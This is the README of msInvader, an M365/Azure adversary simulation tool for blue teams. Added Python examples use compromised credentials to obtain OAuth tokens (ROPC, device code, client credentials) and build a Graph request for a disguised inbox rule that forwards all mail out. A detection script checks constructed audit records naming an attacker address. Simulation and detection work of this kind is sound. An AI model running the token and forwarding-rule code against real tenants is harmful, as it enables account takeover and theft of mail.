M365/Azure adversary simulation tool that generates realistic attack telemetry to help blue teams improve their detection and response capabilities.
mvelazc0/msInvader

msInvader

Black Hat Arsenal 2024 | Open Threat Research Community


msInvader is an adversary simulation tool designed for blue teams to simulate real-world attack techniques within M365 and Azure environments. By generating realistic attack telemetry, msInvader empowers detection engineers, SOC analysts, and threat hunters to assess, enhance, and strengthen their detection and response capabilities.

msInvader supports two common post-compromise scenarios: a compromised user account and a compromised service principal. These scenarios model how adversaries operate after obtaining initial access, letting teams simulate post-compromise behaviour and validate their detection and response mechanisms. For the user account scenario, msInvader obtains tokens with the resource owner password credentials (ROPC) and device authorization (device code) OAuth 2.0 flows, simulating credential compromise (e.g., phishing or password spraying) or MFA bypass (e.g., adversary-in-the-middle (AiTM) or token theft). Note that ROPC is a non-interactive grant: it fails with an interaction_required error when MFA or Conditional Access applies to the account, whereas the device code flow completes once a user finishes the prompt in a browser, so the two flows produce different sign-in telemetry. For the service principal scenario, it uses the client credentials flow to replicate unauthorized application access.

Once authenticated, msInvader reaches Exchange Online (and OneDrive, for the search_onedrive technique) through three methods: the Microsoft Graph API, Exchange Web Services (EWS), and the REST API used by the Exchange Online PowerShell module. The same technique issued through different APIs leaves a different client footprint in the audit logs, so blue teams can generate a wide range of attack techniques across multiple scenarios and confirm that their detections hold regardless of the path the attacker takes.
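The token flows and the Graph path described in the two paragraphs above, as an added example that is not code from msInvader or its author. The request builders are pure functions so the exchange can be inspected and tested offline; post_form() performs the real HTTP call against the Microsoft identity platform v2.0 endpoints. Tenant, client_id and scope values are placeholders, and the create_rule request shows only the Graph method, not the EWS or REST variants.

```python
"""Added example, not code from msInvader or its author: the three OAuth 2.0 token
flows named above against the Microsoft identity platform v2.0 endpoints, plus one
Graph-backed technique (create_rule) once a token is held. Request builders are
pure functions so the exchange can be inspected and tested offline; post_form()
performs the real HTTP call. Tenant, client_id and scope values are placeholders."""
import json
import time
import urllib.error
import urllib.parse
import urllib.request

AUTHORITY = "https://login.microsoftonline.com"
GRAPH_DEFAULT = "https://graph.microsoft.com/.default"      # app-only scope
USER_SCOPE = "https://graph.microsoft.com/Mail.ReadWrite offline_access"


def token_url(tenant):
    return f"{AUTHORITY}/{tenant}/oauth2/v2.0/token"


def devicecode_url(tenant):
    return f"{AUTHORITY}/{tenant}/oauth2/v2.0/devicecode"


# Compromised user, no interactive MFA: ROPC trades username + password for tokens.
def ropc_request(tenant, client_id, username, password, scope=USER_SCOPE):
    return token_url(tenant), {"grant_type": "password", "client_id": client_id,
                               "username": username, "password": password, "scope": scope}


# Compromised user with MFA: device code flow. The user completes sign-in elsewhere and
# the client holding the device_code receives the tokens (token-theft style simulation).
def device_code_request(tenant, client_id, scope=USER_SCOPE):
    return devicecode_url(tenant), {"client_id": client_id, "scope": scope}


def device_token_request(tenant, client_id, device_code):
    return token_url(tenant), {"grant_type": "urn:ietf:params:oauth:grant-type:device_code",
                               "client_id": client_id, "device_code": device_code}


# Compromised service principal: client credentials grant, app-only token.
def client_credentials_request(tenant, client_id, client_secret, scope=GRAPH_DEFAULT):
    return token_url(tenant), {"grant_type": "client_credentials", "client_id": client_id,
                               "client_secret": client_secret, "scope": scope}


def post_form(url, form):
    """POST a form-encoded body and return the JSON response. The identity platform
    reports errors as JSON with a 4xx status, so those bodies are returned, not raised."""
    req = urllib.request.Request(url, data=urllib.parse.urlencode(form).encode(), method="POST")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as e:
        return json.loads(e.read().decode() or "{}")


def classify(resp):
    """Map a token-endpoint response to what the operator should do next."""
    if "access_token" in resp:
        return "ok"
    err = resp.get("error", "")
    if err == "authorization_pending":
        return "pending"        # device code: user has not finished the prompt yet
    if err == "slow_down":
        return "slow_down"      # device code: polled too fast, back off
    if err == "expired_token":
        return "expired"        # device code: user took too long
    if err == "interaction_required":
        return "mfa_required"   # ROPC: MFA / Conditional Access blocks the password-only grant
    return "denied"


def poll_device_code(tenant, client_id, dc_resp, post=post_form, sleep=time.sleep):
    """Poll the token endpoint with the device_code until the user signs in.
    post/sleep are injectable so the loop can be exercised without network access."""
    interval = int(dc_resp.get("interval", 5))
    url, form = device_token_request(tenant, client_id, dc_resp["device_code"])
    while True:
        resp = post(url, form)
        state = classify(resp)
        if state == "ok":
            return resp
        if state == "slow_down":
            interval += 5
        elif state != "pending":
            raise RuntimeError(f"device code flow failed: {resp.get('error')}")
        sleep(interval)


# One technique from the table, via Graph: create an inbox rule that forwards every
# message. The EWS and Exchange Online REST paths for the same technique are not shown.
def graph_forwarding_rule_request(access_token, forward_to, name="Invoices"):
    body = {"displayName": name, "sequence": 1, "isEnabled": True,
            "actions": {"forwardTo": [{"emailAddress": {"address": forward_to}}],
                        "stopProcessingRules": False}}
    return ("POST", "https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules",
            {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"},
            json.dumps(body))
```

To drive a real device code sign-in: `url, form = device_code_request(tenant, client_id)`, `dc = post_form(url, form)`, show the operator `dc["message"]`, then `poll_device_code(tenant, client_id, dc)`. A ROPC attempt against an MFA-protected account comes back as `classify(...) == "mfa_required"`; that failed non-interactive sign-in is itself useful telemetry for the blue team.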

Documentation

Visit the Wiki for documentation.

Demo

msInvader

Supported Techniques

Technique Graph EWS REST
read_email X X
search_mailbox X
search_onedrive X
create_rule X X X
enable_email_forwarding X
add_folder_permission X X
add_mailbox_delegation X
run_compliance_search X
create_mailflow X

For a full list of available techniques, visit Supported Techniques on the Wiki.

Detections

This section will compile public detection strategies tailored to the techniques simulated by msInvader.
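Detection logic for several of the techniques in the table above, run over constructed Unified Audit Log records, as an added example that is not code from msInvader or its author. Field names follow the shape of Exchange-workload UAL records (Operation, UserId, a Parameters array of Name/Value pairs); the records themselves, the tenant domains in INTERNAL_DOMAINS and every address are made up for this example.

```python
"""Added example, not code from msInvader or its author: detection logic for
several techniques in the table above, run over constructed Unified Audit Log
records from the Exchange workload. Field names follow the UAL record shape
(Operation, UserId, Parameters as Name/Value pairs); the records, tenant domains
and addresses are made up for this example."""
import json

INTERNAL_DOMAINS = {"contoso.com", "contoso.onmicrosoft.com"}   # assumed tenant domains
RULE_FORWARD = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}
MAILBOX_FORWARD = {"ForwardingSmtpAddress", "ForwardingAddress"}


def parameters(record):
    """Flatten the UAL Parameters array into a dict; values are strings in the log."""
    return {p["Name"]: str(p.get("Value", "")) for p in record.get("Parameters", [])}


def is_external(address):
    """True when a recipient (plain or smtp:-prefixed) is outside the tenant."""
    addr = address.lower().replace("smtp:", "").strip('[]" ')
    return "@" in addr and addr.rsplit("@", 1)[1] not in INTERNAL_DOMAINS


def analyze(record):
    """Return a finding for a suspicious record, or None for benign ones."""
    op = record.get("Operation", "")
    p = parameters(record)
    user = record.get("UserId", "?")
    if op in ("New-InboxRule", "Set-InboxRule"):
        targets = [p[k] for k in RULE_FORWARD.intersection(p) if p[k]]
        if targets:   # create_rule with forwarding: exfiltration via inbox rule
            sev = "high" if any(is_external(t) for t in targets) else "medium"
            return {"severity": sev, "technique": "create_rule", "user": user,
                    "detail": "rule forwards to " + ", ".join(targets)}
        if p.get("DeleteMessage", "").lower() == "true" or "MoveToFolder" in p:
            return {"severity": "low", "technique": "create_rule", "user": user,
                    "detail": "rule hides mail (" + p.get("Name", "?") + ")"}
    elif op == "Set-Mailbox":   # enable_email_forwarding at the mailbox level
        targets = [p[k] for k in MAILBOX_FORWARD.intersection(p) if p[k]]
        if targets:
            sev = "high" if any(is_external(t) for t in targets) else "medium"
            return {"severity": sev, "technique": "enable_email_forwarding", "user": user,
                    "detail": "mailbox forwards to " + ", ".join(targets)}
    elif op == "Add-MailboxPermission" and "fullaccess" in p.get("AccessRights", "").lower():
        return {"severity": "medium", "technique": "add_mailbox_delegation", "user": user,
                "detail": f"{p.get('User')} granted FullAccess on {p.get('Identity')}"}
    elif op == "Add-MailboxFolderPermission":
        return {"severity": "medium", "technique": "add_folder_permission", "user": user,
                "detail": f"{p.get('User')} granted {p.get('AccessRights')} on {p.get('Identity')}"}
    return None


def run(lines):
    """Analyze one JSON record per line; returns findings in log order."""
    findings = []
    for line in lines:
        if line.strip():
            finding = analyze(json.loads(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample records (not real telemetry), one JSON object per line.
SAMPLE_LOG = """
{"CreationTime": "2024-08-01T10:15:00", "Operation": "New-InboxRule", "Workload": "Exchange", "UserId": "alice@contoso.com", "Parameters": [{"Name": "Name", "Value": "Invoices"}, {"Name": "ForwardTo", "Value": "attacker@evil-example.net"}]}
{"CreationTime": "2024-08-01T10:16:00", "Operation": "New-InboxRule", "Workload": "Exchange", "UserId": "bob@contoso.com", "Parameters": [{"Name": "Name", "Value": "."}, {"Name": "SubjectContainsWords", "Value": "password"}, {"Name": "MoveToFolder", "Value": "RSS Subscriptions"}]}
{"CreationTime": "2024-08-01T10:17:00", "Operation": "Set-Mailbox", "Workload": "Exchange", "UserId": "alice@contoso.com", "Parameters": [{"Name": "Identity", "Value": "alice"}, {"Name": "ForwardingSmtpAddress", "Value": "smtp:attacker@evil-example.net"}, {"Name": "DeliverToMailboxAndForward", "Value": "True"}]}
{"CreationTime": "2024-08-01T10:18:00", "Operation": "Add-MailboxPermission", "Workload": "Exchange", "UserId": "admin@contoso.com", "Parameters": [{"Name": "Identity", "Value": "alice"}, {"Name": "User", "Value": "bob@contoso.com"}, {"Name": "AccessRights", "Value": "FullAccess"}]}
{"CreationTime": "2024-08-01T10:19:00", "Operation": "New-InboxRule", "Workload": "Exchange", "UserId": "carol@contoso.com", "Parameters": [{"Name": "Name", "Value": "Newsletters"}, {"Name": "MarkAsRead", "Value": "True"}]}
{"CreationTime": "2024-08-01T10:20:00", "Operation": "Set-Mailbox", "Workload": "Exchange", "UserId": "admin@contoso.com", "Parameters": [{"Name": "Identity", "Value": "carol"}, {"Name": "AuditEnabled", "Value": "True"}]}
"""

if __name__ == "__main__":
    for f in run(SAMPLE_LOG.splitlines()):
        print(f"[{f['severity']}] {f['technique']} by {f['user']}: {f['detail']}")
```

Severity is driven by where the mail goes: a forward or redirect to a domain outside INTERNAL_DOMAINS is the clearest exfiltration signal, an internal target still deserves review, and a rule that only deletes or moves mail (a common way to hide password-reset and bounce messages) is flagged low so it surfaces during triage without paging anyone. Exporting records that msInvader generated and running them through this kind of logic is the fastest way to see which of the simulated techniques your pipeline actually catches.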

Quick Start Guide

Step 1: Clone repository

```bash
git clone https://github.com/mvelazc0/msInvader.git
```

Step 2: Customize configuration file

  1. Open the config.yaml file located in the msInvader directory.
  2. Customize the configuration file to meet your needs. Refer to the msInvader Configuration file guide for details.
  3. Enable and configure the desired techniques in the playbooks section. Each technique requires specific parameters, which are detailed in the Supported Techniques documentation.

Step 3: Run msInvader

To run msInvader with your configuration file:

```bash
python msInvader.py -c config.yaml
```

Author

References

License

This project is licensed under the Apache 2.0 License; see the LICENSE file for details.
